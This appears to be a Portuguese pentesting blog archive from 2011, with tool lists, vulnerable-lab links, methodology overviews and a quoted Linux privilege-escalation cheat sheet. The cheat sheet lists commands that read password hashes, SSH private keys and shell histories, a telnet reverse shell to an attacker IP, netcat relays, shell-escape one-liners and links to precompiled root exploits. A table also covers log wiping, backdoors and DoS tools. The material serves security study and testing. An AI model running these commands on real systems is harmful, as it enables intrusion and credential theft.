banner468

Mostrando postagens com marcador Pen-test. Mostrar todas as postagens
Mostrando postagens com marcador Pen-test. Mostrar todas as postagens

sábado, 10 de dezembro de 2011

Lista de comandos pós invasão


Lista de comandos a serem executados quando tiverem acesso a uma shell do sistema Linux ou Windows, vai ajudar tanto a iniciantes ha profissionais de penetrations test.

Linux/Unix/BSD Post Exploitation

Windows Post Exploitation

OSX Post Exploitation

Espelho: 
Linux: http://www.4shared.com/file/JRYFK_dQ/LinuxUnixBSDPost-ExploitationC.html
Windows: http://www.4shared.com/file/8zXCnptK/WindowsPost-Exploitation.html
OSX: http://www.4shared.com/file/eQW4_o6G/OSXPost-Exploitation.html
Room362

sexta-feira, 9 de dezembro de 2011

ExploitPack 1.1 - Framework de Exploits


Exploit Pack é uma ferramenta de segurança open source e vem para preencher uma necessidade, uma estrutura para auxiliar escritores e pesquisadores de segurança, com uma licença GPL e Python como motor de seus módulos. Também é baseado em Java e SWT para cair na real multi-plataforma. Licença GPL é usado para todo o projeto e, assim, garantir que o código será sempre livre.

Exploit Pack tentar garante a preencher as necessidades que um desenvolvedor de exploit ou especialista em segurança tem diariamente. E vai ajudá-lo quando você tem que testar a segurança do seu computador ou servidores.




Microsoft Windows 64

Windows XP, 2003, Vista, 2008 & 7 :
ExploitPack – 1.1 win64.exe – Binary win64
MD5Sum: d922dafa82c7afbf71abd7301aeedbd1

GNU/Linux
Debian, Redhat, Ubuntu 2.6 :
ExploitPack-1.1-i386.tar.gz – Source

 MAC OS X
Mac OS X (10.4, 10.5 and 10.6) :
ExploitPack-1.1-i386.bzip – Source

 Free BSD
FreeBSD 7 & 8 :
ExploitPack-1.1-i386.tar.gz – Source

domingo, 6 de novembro de 2011

Ferramentas para Web Pentesting


É muito difícil para iniciante interessados na área de pentesting, encontrar bons materiais para estudo, levando em conta que essa área de pentesting e muito complexa e abrange outras áreas de estudo, segue uma lista de ferramentas essenciais para inicio dos estudos.

EnigmaGroup - http://enigmagroup.org/
XSS Encoding Skills – x5s (Casaba Watcher) - http://www.nottrusted.com/x5s/
Exploit- DB - http://www.exploit-db.com/webapps
The Bodgeit Store - http://code.google.com/p/bodgeit/
LampSecurity http://sourceforge.net/projects/lampsecurity/
hackxor - http://hackxor.sourceforge.net/cgi-bin/index.pl
WackoPicko - https://github.com/adamdoupe/WackoPicko
RSnake’s Vulnerability Lab - http://ha.ckers.org/weird/

Web Security DOJO - http://www.mavensecurity.com/web_security_dojo/
Gruyere (antigo Codelab / Jalsberg) - http://google-gruyere.appspot.com/
Hacme Game - http://hacmegame.org/
SPI Dynamics - http://zero.webappsecurity.com/
Acunetix 1 - http://testphp.vulnweb.com/
Acunetix 2 - http://testasp.vulnweb.com/
Acunetix 3 - http://testaspnet.vulnweb.com/
PCTechtips Challenge - http://pctechtips.org/hacker-challenge-pwn3d-the-login-form/
Damn Vulnerable Web Application - http://dvwa.co.uk/
Mutillidae - http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
The Butterfly Security Project - http://sourceforge.net/projects/thebutterflytmp/
Hacme Casino - http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Hacme Bank 2.0 - http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx
Updated HackmeBank - http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
Hacme Books - http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Hacme Travel - http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
Hacme Shipping - http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Moth - http://www.bonsai-sec.com/en/research/moth.php
Stanford SecuriBench - http://suif.stanford.edu/%7Elivshits/securibench/
SecuriBench Micro - http://suif.stanford.edu/%7Elivshits/work/securibench-micro/
BadStore - http://www.badstore.net/
WebMaven/Buggy Bank - http://www.mavensecurity.com/webmaven
OWASP WebGoat - http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP Vicnum - http://www.owasp.org/index.php/Category:OWASP_Vicnum_Project
OWASP InsecureWebApp - http://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project


Lista de laboratórios:
http://remote-execution.blogspot.com/2011/01/lista-de-servidores-e-aplicativos.html

Bônus:  http://www.4shared.com/document/90Dv4kLF/Hacking_Exposed_chapter_11.html

sábado, 27 de agosto de 2011

Basic Linux Privilege Escalation

Para os amantes de pentest, segue a seguinte lista de comandos para escalação de privilégios, lembrando que nem todos vão funcionar, pois vai variar de acordo com o linux a ser testado. A lista foi criada pelo gotmilk.


Enumeration is the key.
(Linux) privilege escalation is all about:

  • Collect - Enumeration, more enumeration and some more enumeration.

  • Process - Sort through data, analyse and prioritisation.

  • Search - Know what to search for and where to find the exploit code.

  • Adapt - Customize the exploit, so it fits. Not every exploit work for every system "out of the box".

  • Try - Get ready for (lots of) trial and error.


Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
   cat /etc/lsb-release
   cat /etc/redhat-release


What's the Kernel version? Is it 64-bit?
cat /proc/version  
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-


What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set


Is there a printer?
lpstat -a


Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service


Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!
ps aux | grep root
ps -ef | grep root


What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/


Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/


What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla


Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network


What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname


What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w


Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee


Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21


Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # On the targets system. Use the attackers IP!


Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)


Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig


Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d:    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l


What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/


Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/


Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg


What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history


What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root


Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key


File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone


What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases


Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/


Is there anything in the log file(s) (Could help with "Local File Includes"!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp


If commands are limited, you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i


How are file-systems mounted?
mount
df -h


Are there any unmounted file-systems?
cat /etc/fstab


What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the  owner, not the user who started it.

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null


Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders


Any "problem" files? Word-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable files
find /dir -xdev \( -nouser -o -nogroup \) -print   # Noowner files


Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc


How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp


Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com


Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]


(Quick) "Common" exploits. Warning. Pre-compiled binaries files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/


Mitigations
Is any of the above information easy to find? 
Try doing it!
Setup a cron job which automates script(s) and/or 3rd party products


Is the system fully patched? Kernel, operating system, all applications, their  plugins and web services
apt-get update && apt-get upgrade
yum update


Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?


Scripts Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net


Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm


Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

sábado, 23 de julho de 2011

Conceito básicos para um teste de penetração


O teste de penetração é um método que avalia a segurança de um sistema de computador ou de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma análise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em potencial que possa ser resultado de uma má configuração do sistema, falhas em hardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicas contramedidas. Todas as análises submetidas pelos testes escolhidos são apresentadas no sistema, junto com uma avaliação do seu impacto e muitas vezes com uma proposta de resolução ou de uma solução técnica.
Índice

    1 Objetivo
    2 Testes caixa branca vs. caixa preta
    3 Sua aplicação
    4 Ver também
    5 Referências



Objetivo

O objetivo do teste de penetração é determinar a viabilidade de uma ataque e mensurar o seu impacto, caso seja bem sucedido se descoberto. Ele age como um componente na auditoria de segurança.


Testes caixa branca vs. caixa preta

Os testes de penetração podem ser realizados de várias maneiras. A diferença mais comum é a quantidade de detalhes da implementação do sistema a ser testado, que estão disponíveis para os testadores.

O teste da caixa preta assume que não existe qualquer conhecimento prévio da infra-estrutura a ser testada. Sendo que o primeiro teste deve determinar a localização e extensão dos sistemas antes de iniciar a análise.

O teste da caixa branca assume que o testador possui total conhecimento da infra-estrutura a ser testada, incluindo o diagrama da rede, endereçamento IP e qualquer informação complementar.

Teste de caixa preta simulam um ataque de alguém que esteja familiarizado com o sistema, enquanto um teste de caixa branca simula o que pode acontecer durante o expediente de um trabalho ou depois de um "vazamento" de informações, em que o invasor tenha acesso ao código fonte, esquemas de rede e, possivelmente, até mesmo de algumas senhas.


Sua aplicação
Os serviços oferecidos por empresas contratadas para usar o teste de penetração, podem ser uma simples varredura na organização dos endereços IP, abrir/fechar portas ou fazer uma auditoria completa no escopo da rede em busca de vulnerabilidade.

Visão geral

Esse tipo de teste analisa o sistema para qualquer tipo de vulnerabilidade em potencial, explorando vulnerabilidades causados por sistema fracos, mau configurados ou com deficiência operacional. Todos os problema encontrados devem ser reportados ao prestador do serviço.
Para o pessoal que esta ingressando na área, isso artigo e um bom começo, vou agradecer ao pessoal do binushacker.net por informações, mas a frente disponibilizo alguns modelos de relatórios que eu possuo.



Conceitos para os testes:    
 











Etapas Objetivo Técnicas Ferramentas
1 Coletando informações (Footprinting) range de endereços, namespace, informações Sites de busca, whois, DNS zone transferência whois, host, usenet, edgar db, dig, nslookup, samspade, google
2 Impressão digital (Fingerprinting) identificação de serviços, pontos de entrada varredura de ping, TCP/UDP scan, Detecção de OS, netBIOS, SNMP, VPN nmap, unicornscan, paketto, queso, siphon, scanline, cheops-ng, nbtscan, snmpwalk, ike-scan
3 Enumeração identificação de contas de usuário válido, pastas mal protegidas contas da lista de usuários, pastas, banner grabbing dumpsec, sid enum, nat, legion, dcetest, rpcinfo, showmount, netcat, telnet
4 Ganhando acesso Reunidos dados suficientes, tendo acesso ao sistema/rede password eavesdropping, brute force (força bruta) tcpdump, nat, legion, tftp, pwdump, ttdb, bind, IIS .HTR/ISM.DLL, dsniff, ettercap, hydra, brutus-aet2
5 Escalação de privilégios conseguir acesso ao administrador, obter controle completo (root/admin) quebra de senha(password cracking), exploits conhecidos rainbow crack, ophcrack, john the ripper, ophcrack, l0phtcrack, local exploits
6 Furtando dados Consegui acesso ao sistema/rede avaliar confia, procure senhas em texto rhosts, hosts, lsa secrets, user data, config files, registry, scripts, services
7 Cobrindo rastros concluir propriedade de sistema, escondendo intrusão limpando os logs, escondendo ferramentas logcleaner-ng, winzapper, rootkits, file streaming
8 Backdooring configurando backdoors para recuperar o acesso privilegiado criar usuário, lotes de cronograma, infectar arquivos de inicialização, trojanisation, controle remoto cron, at, rc, netcat, keystroke loggers, fpnwclnt.dll, tini, adore, vnc, bo2k
9 Negação de Serviço tornar recursos do sistema indisponível, desative o alvo SYN flood, ICMP techniques, SRC/DST-SYN-requests, OOB, DDoS smurf, bonk, jolt, land, nestea, newtear, syndrop, teardrop, winnuke, trinoo, tfn2k, slowloris, loic


Roteiro de um teste de penetração:



Ref:
http://pt.wikipedia.org/wiki/Teste_de_penetra%C3%A7%C3%A3o
http://remote-execution.blogspot.com/2011/05/metodologias-de-testes-de-penetracao.html

sexta-feira, 17 de junho de 2011

BackBox Linux 1.05


É rápido e leve em recursos
A partir do gestor devidamente configurado XFCE que oferece estabilidade e uma velocidade que dificilmente outro DM pode dar, chegar ao extremo de ajustes de configurações de serviços, parâmetros de arranque e de toda a infra-estrutura, Backbox foi construído com o objetivo de alcançar o máximo desempenho com o consumo mínimo possível de recursos.
Isso faz com que backbox uma distro muito rápida que se adapta as configurações de hardware ainda mais antiga.

Tudo está no lugar certo
Não há dezenas de menus confuso onde você tem que procurar por um aplicativo, não existem softwares desnecessários ou software com as mesmas funções dos outros softwares instalados, tudo está no lugar certo!
Com especial atenção para o uso que o usuário final vai precisar, arquivos de menu e configuração foram organizados e reduzidos ao mínimo necessário para fornecer um intuitivo e fácil de usar Linux distrubution.

É compatível com padrão
Tanto o processo de embalagem do software da caixa de base e da configuração e ajustes do sistema de acompanhamento do Ubuntu / Debian padrão até o último detalhe.
Os usuários do Ubuntu vai se sentir em casa, enquanto os recém-chegados seguirá a documentação oficial e adições backbox para personalizar seu sistema sem trabalho complicado em torno de correções para este trabalho porque… É padrão!

É versátil
Como uma distribuição live backbox oferece uma experiência que poucos podem oferecer outras distros e uma vez instalado, naturalmente, se presta a preencher o papel de uma distribuição desktop orientada devido ao conjunto de pacotes nos repositórios oficiais, e aos do backbox repositório dedicado, proporcionando ao usuário uma fácil distribuição e versátil para o uso.

É amigável com os hackers
Você deseja modificar o software já está na distro para atender às suas finalidades, ou talvez acrescentar um outro que não está presente nos repositórios? Nada poderia ser mais fácil, criar seus próprios Launchpad PPA, enviar o seu pacote e contribuir activamente para a evolução do backbox Linux de maneira fácil e rápida. 

Download  

BackBox Linux 1.05 - i386
Release: 02.05.2011

Name: backbox-1.05-i386.iso
Size: 690,0 MB
MD5: e69c7403f8b5c0c0c6ad813035d0bda1
Torrent
Mirror #1 - Mirror #2 - Mirror #3

BackBox Linux 1.05 - amd64
Release: 02.05.2011

Name: backbox-1.05-amd64.iso
Size: 699,8 MB
MD5: 32db9e3267d6a197f861db8ca258cbf4
Torrent
Mirror #1 - Mirror #2 - Mirror #3

Ref: http://www.backbox.org/content/backbox-linux-now-fluxbox-window-manager

sábado, 11 de junho de 2011

Ferramentas Python para testes de penetração

Se você está envolvido na investigação da vulnerabilidade, engenharia reversa ou teste de penetração, eu sugiro experimentar o Python linguagem de programação. Possui um rico conjunto de bibliotecas e programas úteis. Esta página lista alguns deles.

A maioria das ferramentas listadas são escritos em Python, outros são apenas ligações Python para as bibliotecas existentes C, ou seja, eles fazem essas bibliotecas facilmente utilizáveis ​​em programas Python.

Network

  • Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
  • pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
  • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
  • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
  • Dirtbags py-pcap: read pcap files without libpcap
  • flowgrep: grep through packet payloads using regular expressions
  • httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries
  • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
  • Mallory, man-in-the-middle proxy for testing
  • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly

Debugging and reverse engineering

  • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
  • Immunity Debugger: scriptable GUI and command line debugger
  • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
  • PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
  • pefile: read and work with Portable Executable (aka PE) files
  • pydasm: Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
  • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
  • diStorm64: disassembler library for AMD64, licensed under the BSD license
  • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python

Fuzzing

  • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing
  • antiparser: fuzz testing and fault injection API
  • TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
  • FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches
  • SMUDGE
  • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
  • Fuzzbox: multi-codec media fuzzer
  • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
  • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
  • WSBang: perform automated security testing of SOAP based web services
  • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
  • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library used to write fuzzing programs

Web

  • ProxMon: processes proxy logs and reports discovered issues
  • WSMap: find web service endpoints and discovery files
  • Twill: browse the Web from a command-line interface. Supports automated Web testing
  • Windmill: web testing tool designed to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web tester

Forensics

  • Volatility: extract digital artifacts from volatile memory (RAM) samples
  • SandMan: read the hibernation file, regardless of Windows version
  • LibForensics: library for developing digital forensics applications
  • TrIDLib, identify file types from their binary signatures. Now includes Python binding

Malware analysis

  • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
  • pyClamAV: add virus detection capabilities to your Python software
  • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
  • yara-python: identify and classify malware samples

PDF

  • Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
  • pyPDF: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt...
  • PDFMiner: extract text from PDF files
  • python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support

Misc

  • InlineEgg: toolbox of classes for writing small assembly programs in Python
  • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
  • RevHosts: enumerate virtual hosts for a given IP address
  • simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
  • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • Hachoir: view and edit a binary stream field by field

Other useful libraries and tools

  • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
  • Beautiful Soup: HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of arrays
  • Mayavi: 3D scientific data visualization and plotting
  • RTGraph3D: create dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for consuming Web Services
  • M2Crypto: most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • pyparsing: general parsing module
  • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
  • Pexpect: control and automate other programs, similar to Don Libes `Expect` system
  • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt application framework and GUI library
Para mais libaries, por favor dê uma olhada no PyPI , o Python Package Index.
Dirk loss

segunda-feira, 23 de maio de 2011

Metodologias de testes de penetração

O teste de penetração é um método que avalia a segurança de um sistema de computador ou de uma rede, simulando um ataque de uma fonte maliciosa. O processo envolve uma análise nas atividades do sistema, que envolvem a busca de alguma vulnerabilidade em potencial que possa ser resultado de uma má configuração do sistema, falhas em hardwares/softwares desconhecidas, deficiência no sistema operacional ou técnicas contramedidas. Todas as análises submetidas pelos testes escolhidos são apresentadas no sistema, junto com uma avaliação do seu impacto e muitas vezes com uma proposta de resolução ou de uma solução técnica. Esses testes são feito para avaliar os computadores, sistemas ou redes de vulnerabilidades e explorá-los, a fim de medir o impacto das falhas para o sistema em teste. Os diferentes Frameworks de testes e metodologias, existem para ajudar o "pentester" escolher a melhor estratégia para realizar um teste de penetração bem sucedida. Aqui está uma lista das metodologias mais utilizadas.
http://en.wikipedia.org/wiki/Penetration_test

OSSTMM – Open Source Security Testing Methodology Manual


O Open Source Security Testing Metodologia Manual (OSSTMM) é um peer-reviewed metodologia para a realização de testes de segurança e métricas. Os casos de teste OSSTMM estão divididas em cinco canais (pontos) que o teste coletivamente: informações e dados controles, os níveis de sensibilização para a segurança pessoal, a fraude e os níveis de controle social, engenharia de redes informáticas e de telecomunicações, dispositivos sem fio, dispositivos móveis, controles de acesso físico, segurança, segurança processos e locais físicos, como edifícios, perímetros, e bases militares.
http://www.isecom.org/osstmm/

OWASP


O Open Web Application Security Project (OWASP) é um projeto open-source de segurança do aplicativo. A comunidade OWASP inclui corporações, organizações educacionais e indivíduos de todo o mundo. Essa comunidade trabalha para criar artigos livremente disponíveis, metodologias, documentação, ferramentas e tecnologias
https://www.owasp.org/index.php/Main_Page

ISSAF


O projeto OISSG ISSAF é emblemática. É um esforço para desenvolver uma estrutura de ponta a ponta para a avaliação de segurança. O ISSAF visa oferecer um único ponto de referência para os profissionais envolvidos na avaliação de segurança, ele reflete e aborda as questões práticas de avaliação da segurança.
http://www.oissg.org/wiki/index.php?title=ISAAF-PENETRATION_TESTING_FRAMEWORK

Mais algumas referências:
http://www.oissg.org/wiki/index.php?title=PENETRATION_TESTING_METHODOLOGY
